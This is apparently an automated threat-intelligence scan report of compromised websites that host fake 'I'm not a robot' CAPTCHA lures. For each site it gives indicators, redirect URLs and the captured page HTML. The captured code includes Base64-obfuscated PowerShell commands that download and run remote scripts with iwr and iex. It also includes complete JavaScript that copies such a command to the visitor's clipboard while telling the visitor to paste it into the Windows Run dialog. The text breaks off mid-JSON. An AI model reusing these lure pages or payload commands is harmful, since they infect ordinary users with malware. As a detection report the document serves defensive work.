ClickGrab Report: 2025-04-27
Report Summary
Sites Scanned: 29
Attacks Detected: 121
New Attack Patterns: 0
Affected Sites
Site Domain | Attack Type | Detected Patterns | First Seen |
---|---|---|---|
blessdayservices.org | PowerShell Execution | 5 | 2025-04-27 |
jessespridecharters.com | PowerShell Execution | 5 | 2025-04-27 |
mail.lucprofessional.com.br | PowerShell Execution | 3 | 2025-04-27 |
mail.finocci.com | PowerShell Execution | 1 | 2025-04-27 |
cambodiatouristservice.com | PowerShell Execution | 2 | 2025-04-27 |
admin.gestroom.it | PowerShell Execution | 1 | 2025-04-27 |
test.peperoncinochepassione.it | PowerShell Execution | 3 | 2025-04-27 |
first-security-verden.de | PowerShell Execution | 5 | 2025-04-27 |
lucprofessional.com.br | PowerShell Execution | 3 | 2025-04-27 |
www.first-security-verden.de | PowerShell Execution | 5 | 2025-04-27 |
www.laborpartyjo.com | PowerShell Execution | 3 | 2025-04-27 |
finocci.com | PowerShell Execution | 1 | 2025-04-27 |
www.finocci.com | PowerShell Execution | 1 | 2025-04-27 |
www.website.mypetapp.co.za | PowerShell Execution | 3 | 2025-04-27 |
www.lucprofessional.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-27 |
thesignaturemag.salviatech.com | PowerShell Execution | 3 | 2025-04-27 |
www.bratusferramentas.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-27 |
website.mypetapp.co.za | PowerShell Execution | 3 | 2025-04-27 |
www.zamilgroups.com | PowerShell Execution | 1 | 2025-04-27 |
lucprofessional.grupomoltz.com.br | PowerShell Execution | 3 | 2025-04-27 |
laborpartyjo.com | PowerShell Execution | 3 | 2025-04-27 |
www.thesignaturemag.salviatech.com | PowerShell Execution | 3 | 2025-04-27 |
mail.cambodiatouristservice.com | PowerShell Execution | 2 | 2025-04-27 |
my.salviatech.com | PowerShell Execution | 3 | 2025-04-27 |
82.146.62.232 | PowerShell Execution | 3 | 2025-04-27 |
101.32.40.22 | PowerShell Execution | 4 | 2025-04-27 |
staplebrokenmetaliyro.blogspot.com | PowerShell Execution | 46 | 2025-04-27 |
Detailed URL Analysis
https://blessdayservices.org/up/
Total findings: 5
Indicators of Compromise
Suspicious Patterns
Malicious Code Sample
powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\""; powershell " + htaPath;
JSON Technical Data
https://jessespridecharters.com/v/
Total findings: 5
Indicators of Compromise
Suspicious Patterns
Malicious Code Sample
powershell " + htaPath;
JSON Technical Data
https://mail.lucprofessional.com.br/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
JSON Technical Data
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
https://mail.finocci.com/
Total findings: 1
Indicators of Compromise
Type | Value |
---|---|
URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://mail.finocci.com/", "URLs": "https://t.me/LearnUSDT_bot?start=540835569", "HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>", "ThreatLevel": "None" }
https://cambodiatouristservice.com/
Total findings: 2
Indicators of Compromise
Type | Value |
---|---|
URL | https://browser.certif-update.website/ |
URL | https://browser.certif-update.website/ |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://cambodiatouristservice.com/", "URLs": [ "https://browser.certif-update.website/", "https://browser.certif-update.website/" ], "HTML": "<!DOCTYPE HTML>\r\n<html lang=\"en-US\">\r\n <head>\r\n <meta charset=\"UTF-8\">\r\n <meta http-equiv=\"refresh\" content=\"0; url=https://browser.certif-update.website/\">\r\n <script type=\"text/javascript\">\r\n window.location.href = \"https://browser.certif-update.website/\"\r\n </script>\r\n <title>Loading</title>\r\n </head>\r\n <body>\r\n\t </body>\r\n</html>", "ThreatLevel": "None" }
https://admin.gestroom.it/
Total findings: 1
Indicators of Compromise
Type | Value |
---|---|
URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
JSON Technical Data
{ "URL": "https://admin.gestroom.it/", "URLs": "https://t.me/LearnUSDT_bot?start=540835569", "HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>", "ThreatLevel": "None" }
https://test.peperoncinochepassione.it/
Total findings: 3
Suspicious Patterns
Malicious Code Sample
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
JSON Technical Data
{ "URL": "https://test.peperoncinochepassione.it/", "Base64Strings": { "Base64": "aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=", "Decoded": "iex (iwr 'https://nicostudio.it/pZJHqter.txt' -UseBasicParsing).Content" }, "URLs": [ "https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css", "https://use.fontawesome.com/releases/v5.0.0/css/all.css", "https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png" ], "PowerShellCommands": "PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r", "ClipboardCommands": "PowErsHeLL -W hiddEn ", "SuspiciousKeywords": [ "\u2705", "I am not a robot", "Verification ID", "reCAPTCHA Verification", "Verify You Are Human", "To better prove you are not a robot", "I'm not a robot", "<script>" ], "ClipboardManipulation": [ "...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...", "...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..." ], "PowerShellDownloads": { "FullMatch": "| iex", "Context": "...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`; stageClipboard(commandToRun, verification_id); }..." 
}, "CaptchaElements": [ "ification ID: <span id=\"verification-id\">146820</span>\"", "} function hideCaptchaLoading() { che", "} function hideCaptchaCheckbox() { che", "et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec", "let checkboxBtn = document.getElementById(\"checkbox\"); let chec", "heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri", "let verifywindow = document.getElementById(\"verify-window\"); functi", "andomNumber(); document.getElementById('verification-id').textContent = veri", "ect(); document.execCommand(\"copy\"); doc", "tempTextArea.select(); docum", "href=\"https://cdnjs.cloudflare.com/ajax/libs/font-", "</div> <script> let checkb" ], "HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n 
background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n 
font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span 
class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n 
showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function 
isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n", "ThreatLevel": "High" }
https://first-security-verden.de/
Total findings: 5
Indicators of Compromise
Malicious Code Sample
JSON Technical Data
{ "URL": "https://first-security-verden.de/", "URLs": [ "https://www.webgo.de/assets/images/misc/hazard-50x50.png", "https://www.webgo.de/assets/images/misc/hazard-50x50.png", "https://www.webgo.de/assets/images/logo.svg", "https://www.webgo.de/assets/images/misc/construction.png", "https://www.webgo.de/webhosting/" ], "HTML": "<html>\r\n<head>\r\n \r\n<title>Neue Domain bei der webgo GmbH</title>\r\n<style type=\"text/css\">\r\n \r\nbody {font-family: sans-serif;}\r\n \r\n.main {\r\nbackground: #ffffff; /* Old browsers */\r\nbackground: -moz-linear-gradient(top, #ffffff 0%, #e5e5e5 100%); /* FF3.6+ */\r\nbackground: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ffffff), color-stop(100%,#e5e5e5)); /* Chrome,Safari4+ */\r\nbackground: -webkit-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* Chrome10+,Safari5.1+ */\r\nbackground: -o-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* Opera 11.10+ */\r\nbackground: -ms-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* IE10+ */\r\nbackground: linear-gradient(to bottom, #ffffff 0%,#e5e5e5 100%); /* W3C */\r\nheight: 540px;\r\nwidth: 1200px;\r\npadding: 20px;\r\nmargin: 30px auto;\r\n box-shadow: 0px 0 5px #555;\r\n \r\n}\r\n \r\n.hazard {background-image: url(\"https://www.webgo.de/assets/images/misc/hazard-50x50.png\"); width: 1240px; height: 10px; margin: 20px -20px -30px -20px;}\r\n.hazard2 {background-image: url(\"https://www.webgo.de/assets/images/misc/hazard-50x50.png\"); width: 1240px; height: 10px; margin: 20px -20px -30px -20px; position: relative; top: 140px;}\r\n \r\n.header {\r\n width: 100%;\r\n height: 68px;\r\n background-image: url(\"https://www.webgo.de/assets/images/logo.svg\");\r\n background-repeat:no-repeat;\r\n}\r\n.content {\r\nmargin: 20px 0 0 -20px;\r\nbox-shadow: 0px 0 0px #555;\r\nwidth: 100%;\r\nheight: 200px;\r\npadding: 20px;\r\nfont-size: 1.5em;\r\n \r\n}\r\n.footer {\r\n height: 32px;\r\n padding: 10px 0 0 0;\r\n position: relative;\r\n 
